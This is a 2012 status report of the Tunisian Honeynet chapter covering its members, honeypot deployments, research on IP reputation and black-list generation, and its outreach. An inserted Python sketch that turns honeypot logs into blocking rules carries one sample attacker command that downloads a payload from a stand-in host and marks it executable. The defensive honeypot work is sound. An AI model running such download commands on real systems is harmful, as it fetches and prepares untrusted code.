Tunisian (Saherhoneynet) Chapter Status Report For 2012

ORGANIZATION
All team members belong to the staff of the National Agency for Computer Security (NACS) and the Tunisian CERT (tunCERT); the chapter is open to volunteers (students, researchers, professionals and partners) under a special agreement.
Current chapter members and their activities:

  • Hafidh EL Faleh: Tunisian Honeynet chapter lead; Cyber early warning system team manager.
  • Haythem EL MIR: IT cyber-security consultant (professional).
  • Hassen Bahri: tunCERT manager.
  • Marwen Ben Rached: Cyber early warning system team member (programmer).
  • Jihene Ksiksi: Cyber early warning system team member (support).

Changes in the structure:

  • Tarek Mouhamed: CTO of NACS/tunCERT (new member).
  • Amine Rached: CSIRT (incident team) manager (new member).
  • Amine Abid: CSIRT (incident team) support (new member).

DEPLOYMENTS
From the start of the project, the team has tried to stay up to date with the technologies in use; it tested all available detection and honeypotting tools and chose the most reliable ones.
The technologies currently deployed are:

  • SurfIDS
  • SMTP-HP
  • Kippo
  • Kippo-Graph
  • Dionaea
  • Glastopf
  • Honeynet Webviz
  • Cuckoo
  • HonEeeBox

Architecture diagram: http://www.honeynet.tn/rep/clip_image002.jpg

RESEARCH AND DEVELOPMENT

Developed Projects

• Design of a tool for analysing the URLs and binaries found in SSH input, using the output of the Kippo SSH honeypot.


Projects currently under research

IP Reputation Database

• Designing and specifying a tool that interfaces with several honeypot tools (Dionaea, Glastopf, Kippo, ...) and maintains an up-to-date database for checking the reputation of any IP address against its historical logs.
• Providing web access (web services) to this tool: automatically obtaining the source IP, returning the information related to its reputation history, and sending the instructions needed for the cleaning process.

Black-List Generator

• Creating an updated list of malicious domains and hosts from the malware samples obtained.
• Selecting the equipment profile for which ACLs are generated (firewall, IDS/IPS, proxy, ...).
• Designing and specifying the techniques used by the black-list tool.
• Sharing the black-list online.
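As an added illustration of the two project ideas above (IP reputation from honeypot history, and an ACL black-list per equipment profile), not code from the report or the chapter's tools: a small Python sketch that folds constructed Kippo-style log lines into per-IP reputation records and emits blocking rules. The log layout, the scoring rule in `verdict` and the two profiles are assumptions.

```python
import re
from urllib.parse import urlparse
# Constructed sample in the style of a kippo.log file (format assumed; not data from the report).
SAMPLE_LOG = """\
2012-06-15 10:23:45+0100 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 198.51.100.7:54321 (10.0.0.5:2222) [session: 1]
2012-06-15 10:23:49+0100 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.7] login attempt [root/123456] succeeded
2012-06-15 10:23:55+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,198.51.100.7] CMD: wget http://malware.example/bot.tgz; chmod +x bot.tgz
2012-06-16 02:10:03+0100 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 198.51.100.7:40001 (10.0.0.5:2222) [session: 2]
2012-06-16 02:10:05+0100 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.7] login attempt [admin/admin] failed
2012-06-17 09:00:00+0100 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 203.0.113.9:1111 (10.0.0.5:2222) [session: 3]
"""
IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
CONN_RE = re.compile(r"^(\S+ \S+) \[kippo\.core\.honeypot\.HoneyPotSSHFactory\] New connection: " + IP + r":\d+")
LOGIN_RE = re.compile(r"^(\S+ \S+) \[SSHService ssh-userauth on HoneyPotTransport,\d+," + IP + r"\] login attempt \[[^\]]*\] (succeeded|failed)")
CMD_RE = re.compile(r"^(\S+ \S+) \[SSHChannel .*HoneyPotTransport,\d+," + IP + r"\] CMD: (.*)$")
URL_RE = re.compile(r"https?://[^\s;'\"]+")

def build_reputation(log_text):
    """Fold Kippo log lines into one record per source IP: the 'historical logs' behind an IP reputation lookup."""
    rep = {}
    def rec(ip, ts):
        r = rep.setdefault(ip, {"first_seen": ts, "last_seen": ts, "connections": 0,
                                "logins_ok": 0, "logins_failed": 0, "urls": set(), "hosts": set()})
        r["last_seen"] = max(r["last_seen"], ts)  # string compare is safe: same timestamp layout and UTC offset
        return r
    for line in log_text.splitlines():
        if m := CONN_RE.match(line):
            rec(m[2], m[1])["connections"] += 1
        elif m := LOGIN_RE.match(line):
            rec(m[2], m[1])["logins_ok" if m[3] == "succeeded" else "logins_failed"] += 1
        elif m := CMD_RE.match(line):
            r = rec(m[2], m[1])
            for url in URL_RE.findall(m[3]):  # URLs typed into the fake shell are payload drop sites
                r["urls"].add(url)
                r["hosts"].add(urlparse(url).hostname)
    return rep

def verdict(r):
    """Hypothetical scoring rule: fetching a payload outranks a successful login, which outranks mere probing."""
    return "malicious" if r["urls"] else "compromise-attempt" if r["logins_ok"] else "scanner"

def generate_acl(rep, profile):
    """Black-list generator: emit blocking rules for one equipment profile from the reputation records."""
    bad_ips = sorted(ip for ip, r in rep.items() if verdict(r) != "scanner")
    bad_hosts = sorted({h for r in rep.values() for h in r["hosts"] if h})
    if profile == "iptables":
        return [f"iptables -A INPUT -s {ip} -j DROP" for ip in bad_ips]
    if profile == "squid":  # dstdomain ACL entries, to be referenced from an http_access deny line
        return [f"acl malware_hosts dstdomain {h}" for h in bad_hosts]
    raise ValueError(f"unknown equipment profile: {profile}")
```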

FINDINGS

Presentations:

• HP Workshop 2012: Tunisian Chapter Update
  Link: http://www.honeynet.tn/node/60

• ITU Regional Workshop on “IMPACT Alert - Cyber Drill for Partner Countries”, Amman, Jordan, 15-17 July 2012
  The National Platform for Tracking Cyber Attacks "SAHER"
  http://www.itu.int/ITU-D/arb/ARO/2012/CyberDrill/Documents/doc10-Saher2012.pptx

Workshop

How to interact with the Tunisian Chapter

E-mail: honeynet@ansi.tn
Website: http://www.honeynet.tn
Twitter: http://twitter.com/SaherHoneyNet
LinkedIn: http://www.linkedin.com/groups/The-Honeynet-Project-Tunisia-chapter-4142905
Chapter page: http://www.honeynet.org/chapters/tunisian

GOALS

The main goals of Saher-HoneyNet are:

• Detecting malicious activities and reporting them to the relevant parties, by deploying a network of honeypot sensors and setting up a secure communication channel for reporting.
• Assisting Tunisian users in cleaning their infected computers by providing technical resources, online assistance and even on-site assistance, in coordination with the incident response team of tunCERT.
• Providing technical materials for the awareness activity, in order to educate the national community on the malware threat and how to mitigate infections.
• Providing data and technical resources for research activities, in collaboration with universities.
• Developing technical guides on malware analysis, detection technologies and best practices for mitigating malware infections, in coordination with the malware research centre of tunCERT.
• Coordinating with international security networks to share information related to malicious activities.

MENTORING

Supervision of traineeships for university students:

• Final project: solutions for detecting viral attacks (Honeynet).
• Final project: development of a blacklist generation console.
• Traineeship: deployment of a sandbox platform.